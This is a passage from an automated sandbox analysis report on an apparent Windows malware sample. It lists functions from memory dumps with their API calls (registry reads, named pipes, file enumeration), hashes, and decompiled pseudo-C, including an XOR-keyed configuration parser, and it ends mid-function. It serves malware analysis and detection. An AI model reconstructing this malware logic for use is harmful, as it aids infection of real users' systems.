                              • Opcode Fuzzy Hash: ada8b5bf8815ddde3b37d4368863fc9366d08b6aeebb5f40083d8589b6a5d708
                              • Instruction Fuzzy Hash: 85B012B514A100BBDE114F90DF04F057E31F750700F004031F30414060C2354C60EB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E69F0, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: debd8a5eccaceefd7a0750ede8da878f7aac1cb548e9645ffbef79ed9d5717c6
                              • Instruction ID: 0ec3dc23322c734a3052f3aa50d7860814386ed00e70f84f4c1331ad9f7c824b
                              • Opcode Fuzzy Hash: debd8a5eccaceefd7a0750ede8da878f7aac1cb548e9645ffbef79ed9d5717c6
                              • Instruction Fuzzy Hash: C3B012B5110300ABCB524B00DF0EF057F66A790704F004010B3094C0B08E320820EB05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D032D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: c6e34df155e9c4916800fed23dbffc4945ef98a01131f31c895bf6b1639d273b
                              • Instruction ID: 6fdd09459114dca7aff406e2dfc0f552a5aec1acc279364eb74489c12e230bc2
                              • Opcode Fuzzy Hash: c6e34df155e9c4916800fed23dbffc4945ef98a01131f31c895bf6b1639d273b
                              • Instruction Fuzzy Hash: F5B012B5010200EBCFA24B00DD0EF057F66A750700F008010B2064C1F08B311820EB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D2363, Relevance: 1.3, APIs: 1, Instructions: 98COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D2363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E049DA483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E049D55DC(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E049D6DFA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E049D6B8E(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t42 = E049D6E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                              0x049d236e
                              0x049d2371
                              0x049d237a
                              0x049d237d
                              0x049d2380
                              0x049d2383
                              0x049d247c
                              0x049d2480
                              0x049d2395
                              0x049d23a1
                              0x049d23a8
                              0x049d23af
                              0x00000000
                              0x00000000
                              0x049d23b5
                              0x049d23bd
                              0x00000000
                              0x00000000
                              0x049d23c3
                              0x049d23cc
                              0x049d23d0
                              0x00000000
                              0x00000000
                              0x049d23d2
                              0x049d23d9
                              0x049d23de
                              0x049d23e0
                              0x049d23e3
                              0x049d2461
                              0x049d2468
                              0x049d246a
                              0x00000000
                              0x00000000
                              0x049d246c
                              0x049d2470
                              0x049d2475
                              0x049d2475
                              0x00000000
                              0x049d2470
                              0x049d23ea
                              0x049d23f2
                              0x049d23f2
                              0x049d23fb
                              0x049d2409
                              0x049d245d
                              0x049d245d
                              0x00000000
                              0x049d242c
                              0x049d242f
                              0x00000000
                              0x049d242f
                              0x049d2409
                              0x049d2449
                              0x049d244e
                              0x049d2450
                              0x049d2465
                              0x00000000
                              0x049d2465
                              0x049d2452
                              0x049d2458
                              0x049d245b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d245b

                              APIs
                              • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 049D23EA
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction ID: 9eff4fdd35f204daffa16c763cd744ce7476808d6b0d17098dea3d1aba23dd7c
                              • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction Fuzzy Hash: 9C312975A00219EFEF21DFA4C880BEEB7B9AF44344F10C4F9E959A7140D670AE85CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CCAEC, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053CCB7E
                                • Part of subcall function 053CC50B: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 053CC52D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
                              • Opcode ID: 5f39ab478a6b352ee47bc7dbded9c2e50bcce00b69f4cb98fdac657eb0f77d0d
                              • Instruction ID: 84d8ff34caeafa666d34b1652e82e3ec6a6e1d6e91586d602acec8c55085729b
                              • Opcode Fuzzy Hash: 5f39ab478a6b352ee47bc7dbded9c2e50bcce00b69f4cb98fdac657eb0f77d0d
                              • Instruction Fuzzy Hash: 6211C176610209ABCB19DB98DCD5EBD7FB9EB48310F0010BDFA169B641DAB0AD008B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DC8EB, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(053D3C99,053F0384,00000018,053CD760,064F8DBA,?,053CD760,064F8DBA,?,053CD760,064F8DBA,?,?,053D3C99,?,053CD760), ref: 053DC9A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 855c65b71327f5ce16ad324218d3d8e1607bd4b6b512aeec9381d90744a266fe
                              • Instruction ID: 258e4b7b3f5a16a7101ee3d51ff6b28fc69804de6cb0adbab2b5f9891184da56
                              • Opcode Fuzzy Hash: 855c65b71327f5ce16ad324218d3d8e1607bd4b6b512aeec9381d90744a266fe
                              • Instruction Fuzzy Hash: B2112C73620108ABC758DF99FC9AC6A7FE9F780310F154167F54B8B192EA706901DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C311B, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 053C318C
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C882D
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,00000020,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C883C
                                • Part of subcall function 053CAF6F: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 053CAF95
                                • Part of subcall function 053CAF6F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 053CAFA1
                                • Part of subcall function 053CAF6F: GetModuleHandleA.KERNEL32(?,064F96FC,00000000,?,00000000), ref: 053CAFC1
                                • Part of subcall function 053CAF6F: GetProcAddress.KERNEL32(00000000), ref: 053CAFC8
                                • Part of subcall function 053CAF6F: Thread32First.KERNEL32(?,0000001C), ref: 053CAFD8
                                • Part of subcall function 053CAF6F: CloseHandle.KERNEL32(?), ref: 053CB020
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: d6a096a22edd76a2b214ba4bfb36e4a3d783629b894cee5401e93fe6f5d71aa9
                              • Instruction ID: b5498c6e3820a13a832ffbd9ac295ae13e13bc5400beb7170ec709698fbfb734
                              • Opcode Fuzzy Hash: d6a096a22edd76a2b214ba4bfb36e4a3d783629b894cee5401e93fe6f5d71aa9
                              • Instruction Fuzzy Hash: 2E01A2B5620208BFDB16EBA9DD8DC9FBFECEB04358B004099F402A7211DE75AE01C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D2E8A, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053D2F00
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C882D
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,00000020,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C883C
                                • Part of subcall function 053CFD22: lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                                • Part of subcall function 053CFD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
                                • Part of subcall function 053CFD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                                • Part of subcall function 053CFD22: GetLastError.KERNEL32 ref: 053CFDE1
                                • Part of subcall function 053CFD22: HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: 510a7f31a90d5aef07ce0945cecfe4c6a9c20bc4f74b1af16d65aea2dd0da381
                              • Instruction ID: 0955b68e8f56ad1f2a5c2788e7f04eb6e5d5c6801490c279cc956d097b134203
                              • Opcode Fuzzy Hash: 510a7f31a90d5aef07ce0945cecfe4c6a9c20bc4f74b1af16d65aea2dd0da381
                              • Instruction Fuzzy Hash: F8015E35620214BBDB26DB58DD0EF9FBBFCEB04754F100095F502AB180DAB0BA00D761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C6C21, Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C6C3F
                                • Part of subcall function 053CEA7F: memset.NTDLL ref: 053CEAA5
                                • Part of subcall function 053CEA7F: memcpy.NTDLL ref: 053CEACD
                                • Part of subcall function 053CEA7F: GetLastError.KERNEL32(00000010,00000218,053E8D4D,00000100,?,00000318,00000008), ref: 053CEAE4
                                • Part of subcall function 053CEA7F: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,053E8D4D,00000100), ref: 053CEBC7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: 2656f5ff240f779af9815212aee6455aa81f847336e29ddf3389fb4fe70ce908
                              • Instruction ID: 728406b53e349da7bfbd8f61870a7ded0d1713ae9824efc70d57f6578d8d9bbb
                              • Opcode Fuzzy Hash: 2656f5ff240f779af9815212aee6455aa81f847336e29ddf3389fb4fe70ce908
                              • Instruction Fuzzy Hash: 7B01ADB16027186BC721DF2CE849B9A7FE8EF45614F008569FC58A6241D7B0DD1487A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4FA0, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D4FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E049D88FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E049D262B(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                              0x049d4fa8
                              0x049d4fc2
                              0x00000000
                              0x049d4fde
                              0x049d4fb9
                              0x049d4fc0
                              0x00000000
                              0x00000000
                              0x049d4fe5

                              APIs
                              • lstrlenW.KERNEL32(?,?,?,049D4AAE,3D049DC0,80000002,049D6096,049DA6E1,74666F53,4D4C4B48,049DA6E1,?,3D049DC0,80000002,049D6096,?), ref: 049D4FC5
                                • Part of subcall function 049D262B: SysAllocString.OLEAUT32(049DA6E1), ref: 049D2645
                                • Part of subcall function 049D262B: SysFreeString.OLEAUT32(00000000), ref: 049D2685
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFreelstrlen
                              • String ID:
                              • API String ID: 3808004451-0
                              • Opcode ID: d6acfc9fd0726fc3cad38cc639b17ed7e0ba01e6435ade87b6988a719b98de5c
                              • Instruction ID: 6a4d79aa744fcd64c9f3d0b264acc25664737b200cb33153a0f4c726e1b95a16
                              • Opcode Fuzzy Hash: d6acfc9fd0726fc3cad38cc639b17ed7e0ba01e6435ade87b6988a719b98de5c
                              • Instruction Fuzzy Hash: 20F0923204420EBFDF06AF94DC05EAA3F6AEF08394F048025FA1454071DB32E9B1EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6A16, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D6A16(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E049D60DD(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E049D6DFA(_a4);
				}
				return _t12;
			}





                              0x049d6a22
                              0x049d6a27
                              0x049d6a2b
                              0x049d6a32
                              0x049d6a3d
                              0x049d6a41
                              0x049d6a41
                              0x049d6a4a

                              APIs
                                • Part of subcall function 049D60DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 049D6113
                                • Part of subcall function 049D60DD: memset.NTDLL ref: 049D6188
                                • Part of subcall function 049D60DD: memset.NTDLL ref: 049D619C
                              • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,049D5BE3,?,?,049D512B,00000002,?,?,?), ref: 049D6A32
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpymemset$FreeHeap
                              • String ID:
                              • API String ID: 3053036209-0
                              • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction ID: 4aaefc5fecad5cdda1ae3702d41db7fcf6e4a789764490f36e0f0ab0051f20eb
                              • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction Fuzzy Hash: 23E08C37400128B7DB122E98EC00DEFBF5CCF82694F04C030FE088A200E632EA2097E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C2E31, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053C2E3B
                                • Part of subcall function 053DD058: RegOpenKeyExA.KERNEL32(053C2E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD09F
                                • Part of subcall function 053DD058: RegOpenKeyExA.ADVAPI32(053C2E53,053C2E53,00000000,00020019,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0B5
                                • Part of subcall function 053DD058: RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction ID: 11b636deecc4d6037844db1fac0c3c850c7ff0a9f85324c4313dee5b86dcd799
                              • Opcode Fuzzy Hash: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction Fuzzy Hash: B5E0C73134010CBBEB00AE90EC05FADBB68EF40344F808008BE0C2F282CA71EA64C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E3589, Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2,?,00000318), ref: 053E35A3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: ecb0fc0758cdddadd2ea897e89923ef8a9f47763e299cd7632c39e1eb181bcc8
                              • Instruction ID: 3dc13200978133936a17139680828ece3de42904841545e3fc73d6695c747d1c
                              • Opcode Fuzzy Hash: ecb0fc0758cdddadd2ea897e89923ef8a9f47763e299cd7632c39e1eb181bcc8
                              • Instruction Fuzzy Hash: 50D01731E01629DBCB219B95DC8AA9EFBB0BF08720F608224F8607B1D0C7301912DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 053DF63F, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053C6285: ExpandEnvironmentStringsW.KERNEL32(053D34DD,00000000,00000000,00000001,00000000,00000000,053CEFEF,053D34DD,00000000,053CEFEF,00000020), ref: 053C629C
                                • Part of subcall function 053C6285: ExpandEnvironmentStringsW.KERNEL32(053D34DD,00000000,00000000,00000000), ref: 053C62B6
                              • lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                              • memset.NTDLL ref: 053DF6DF
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                              • lstrlenW.KERNEL32(0000002C), ref: 053DF732
                              • lstrlenW.KERNEL32(?), ref: 053DF73A
                              • memset.NTDLL ref: 053DF75D
                              • wcscpy.NTDLL ref: 053DF76F
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                              • RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                              • FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                              • FindClose.KERNEL32(?), ref: 053DF826
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                              • lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • FindNextFileW.KERNEL32(?,00000000), ref: 053DF8D2
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053DF8E4
                              • FindClose.KERNEL32(?), ref: 053DF8FF
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 3598660fbffd7b9a547a4a74aee541dbabafefc09ebf47931b0612ac1a87ac6a
                              • Instruction ID: 2c0ea78a8b49dcb4b574fe4f21e9abfd7a8144a4fd20e7c593b7bb8f33098815
                              • Opcode Fuzzy Hash: 3598660fbffd7b9a547a4a74aee541dbabafefc09ebf47931b0612ac1a87ac6a
                              • Instruction Fuzzy Hash: C8819E72508345AFC761EF24ECC9B1BBBF9FF84304F044829F8969A191DBB5D8448B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D294D, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E049D294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x49dd2b4; // 0x69b25f44
				if(E049D5740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x49dd308 = _v8;
				}
				_t33 =  *0x49dd2b4; // 0x69b25f44
				if(E049D5740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x49dd2b4; // 0x69b25f44
				_push(_t115);
				if(E049D5740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x49dd270, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x49dd2b4; // 0x69b25f44
						_t45 = E049D4F59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x49dd278 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x49dd2b4; // 0x69b25f44
						_t46 = E049D4F59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x49dd27c = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x49dd2b4; // 0x69b25f44
						_t47 = E049D4F59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x49dd280 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x49dd2b4; // 0x69b25f44
						_t48 = E049D4F59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x49dd004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x49dd2b4; // 0x69b25f44
						_t49 = E049D4F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x49dd02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x49dd2b4; // 0x69b25f44
						_t50 = E049D4F59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x49dd284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
